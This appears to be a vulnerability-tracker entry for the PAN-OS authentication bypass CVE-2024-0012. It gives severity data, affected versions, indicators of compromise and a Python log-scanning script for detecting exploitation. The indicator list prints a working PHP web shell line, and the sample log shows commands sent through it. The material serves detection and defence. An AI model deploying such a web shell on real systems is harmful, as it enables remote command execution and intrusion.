CVE-2024-0012
published 2024-11-18


Priority: P1 (100)
CVSS 3.1: 9.8 critical
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV, ITW, EXPLOIT, Ransomware, Initial access
CISA Known Exploited Vulnerability, due 2024-12-09
Exploited in the wild
EPSS: 99.70% (100.0th percentile)
An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 (https://security.paloaltonetworks.com/CVE-2024-9474). The risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines (https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431). This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software. Cloud NGFW and Prisma Access are not impacted by this vulnerability.

Affected

42 ranges (showing 25)

Vendor              Product         Version range            Fixed in
palo_alto_networks  pan-os          >= 10.2.0 < 10.2.12-h2   10.2.12-h2
palo_alto_networks  pan-os          >= 11.0.0 < 11.0.6-h1    11.0.6-h1
palo_alto_networks  pan-os          >= 11.1.0 < 11.1.5-h1    11.1.5-h1
palo_alto_networks  pan-os          >= 11.2.0 < 11.2.4-h1    11.2.4-h1
paloalto            cloud_ngfw      (no range listed)
paloalto            cortex_xpanse   (no range listed)
paloalto            cortex_xsiam    (no range listed)
paloalto            globalprotect   (no range listed)
paloalto            pan-os          (no range listed)
paloalto            panorama        (no range listed)
paloalto            prisma_access   (no range listed)
paloaltonetworks    pan-os          (14 further entries, no ranges listed)

Detection & IOCs (extracted from sources)

hash (SHA-256): 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668
path: /var/appweb/htdocs/unauth/{between 4 and 6 random characters}
ip: 77.221.158[.]154
domain: censysinspect[.]com
url: censysinspect[.]com/global-protect/portal/fonts/Latte-Regular.woff
hash (SHA-1): e9cd4829b3e64f2f6f45e2761d474f213009d4c8
hash (SHA-1): af817679227921768e15a3a5971b263d5fcf6f75
hash (SHA-1): caae3165bda2e4434f487dee30e39a92e808bfbc
hash (SHA-1): 90f6890fa94b25fbf4d5c49f1ea354a023e06510
hash (SHA-1): fca6e83abce58e47e247bee3ebaef3fc4ad89e75
hash (SHA-1): 9a7355565ff9d84e1c61e2174ea1a54358f9628f
hash (SHA-1): c1dcbf5816f93038313655f1a99f5efc847c637b
hash (SHA-1): c63f646edfddb4232afa5618e3fac4eee1b4b115
command (web shell source): <?php $z="system";if(${"_POST"}["b"]=="iUqPd"){ $z(${"_POST"}["x"]);};
  • Monitor for web shell files dropped under /var/appweb/htdocs/unauth/ with 4–6 random character filenames on PAN-OS devices, indicating post-exploitation activity.
  • Alert on HTTP requests to the PAN-OS management web interface bearing the user-agent string 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko', which was observed during multiple actor exploit attempts.
  • Hunt for interactive command execution and dropped malware (web shells, Sliver implants, crypto miners) on PAN-OS firewalls as post-exploitation indicators of CVE-2024-0012 chained with CVE-2024-9474.
  • Scan for DaggerFly Linux implant activity embedding itself in crond, sshd, and netstat binaries on compromised PAN-OS hosts.
  • Check for the PHP web shell POST parameter 'b' with value 'iUqPd' in web server logs on PAN-OS devices as a specific indicator of the observed web shell payload.
  • A more complete and continuously updated list of attacker IP addresses is available at the Unit42-Timely-Threat-Intel GitHub repository for blocking and detection.
  • Detect use of Toshiba executable (toshdpdb.exe) and malicious DLL (toshdpapi.dll) via DLL sideloading to deploy PlugX/Korplug backdoor in attacks attributed to Emperor Dragonfly exploiting CVE-2024-0012.
  • CVE-2024-0012 only affects PAN-OS 10.2, 11.0, 11.1, and 11.2; Cloud NGFW and Prisma Access are not impacted.
  • 7% of cloud environments with vulnerable PAN-OS appliances had the management interface internet-facing and exploitable to unauthenticated RCE; the remaining 93% required network access to the management interface.
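The three log-based indicators in the list above (the observed user-agent string, requests to 4-6 character names under /unauth/, and the web shell parameter b=iUqPd) can be turned into one hunting pass over management-interface access logs. The script below is an added example, not code from the page or from Palo Alto Networks; the log lines are constructed, and it assumes a combined-log-format record with an optional trailing quoted request body (PAN-OS does not log bodies in that shape by default) and that the /var/appweb/htdocs web root is served at the URL root, so the drop path appears as /unauth/<name>.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicators copied from the detection list for CVE-2024-0012.
SUSPECT_USER_AGENT = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko"
# Web shell drop path: /var/appweb/htdocs/unauth/<4-6 random chars>. Assumption: the
# web root is served at "/", so the URL path is /unauth/<name>; an extension is allowed.
UNAUTH_DROP_RE = re.compile(r"^/unauth/[A-Za-z0-9]{4,6}(?:\.\w+)?(?:\?.*)?$")
# The PHP web shell checks $_POST["b"] == "iUqPd"; look for it in a query string or body.
WEBSHELL_PARAM_RE = re.compile(r"(?:^|[?&])b=iUqPd(?:&|$)")

# Combined log format plus an optional trailing quoted body (assumed, non-standard field).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<body>[^"]*)")?$'
)


@dataclass
class Finding:
    line_no: int
    ip: str
    reasons: List[str]


def check_line(line_no: int, line: str) -> Optional[Finding]:
    """Return a Finding if the access-log line matches any CVE-2024-0012 indicator."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line: skip rather than guess
    reasons = []
    if m["ua"] == SUSPECT_USER_AGENT:
        reasons.append("user-agent observed in exploit attempts")
    path = m["path"]
    if UNAUTH_DROP_RE.match(path):
        reasons.append("request to /unauth/ with 4-6 char name (possible web shell)")
    query = path.partition("?")[2]
    body = m["body"] or ""
    if WEBSHELL_PARAM_RE.search(query) or WEBSHELL_PARAM_RE.search(body):
        reasons.append("web shell parameter b=iUqPd")
    return Finding(line_no, m["ip"], reasons) if reasons else None


def scan(lines) -> List[Finding]:
    """Run check_line over an iterable of log lines and collect the hits."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = check_line(n, line.rstrip("\n"))
        if f:
            findings.append(f)
    return findings


# Constructed sample log (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.10 - - [18/Nov/2024:10:01:02 +0000] "GET /php/login.php HTTP/1.1" 200 1234 "-" '
    '"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko"',
    '203.0.113.10 - - [18/Nov/2024:10:01:05 +0000] "POST /unauth/aq3Kd HTTP/1.1" 200 17 "-" '
    '"curl/8.4.0" "b=iUqPd&x=id"',
    '198.51.100.7 - - [18/Nov/2024:10:02:00 +0000] "GET /php/login.php HTTP/1.1" 200 1234 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0"',
    '203.0.113.10 - - [18/Nov/2024:10:01:07 +0000] "GET /unauth/aq3Kd?b=iUqPd&x=whoami HTTP/1.1" 200 40 "-" '
    '"curl/8.4.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} from {f.ip}: " + "; ".join(f.reasons))
```

Lines 1, 2 and 4 of the sample are flagged; line 3 is a normal login request and is not. Before deploying, baseline the legitimate paths your PAN-OS version serves under /unauth/ and exclude them from UNAUTH_DROP_RE, since the 4-6 character rule alone will match some benign names; the user-agent and b=iUqPd matches are far more specific and should be alerted on directly.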

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v4.0     9.3    CRITICAL  CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:H/U:Red
vulncheck  -        9.3    CRITICAL
cisa       -        9.3    CRITICAL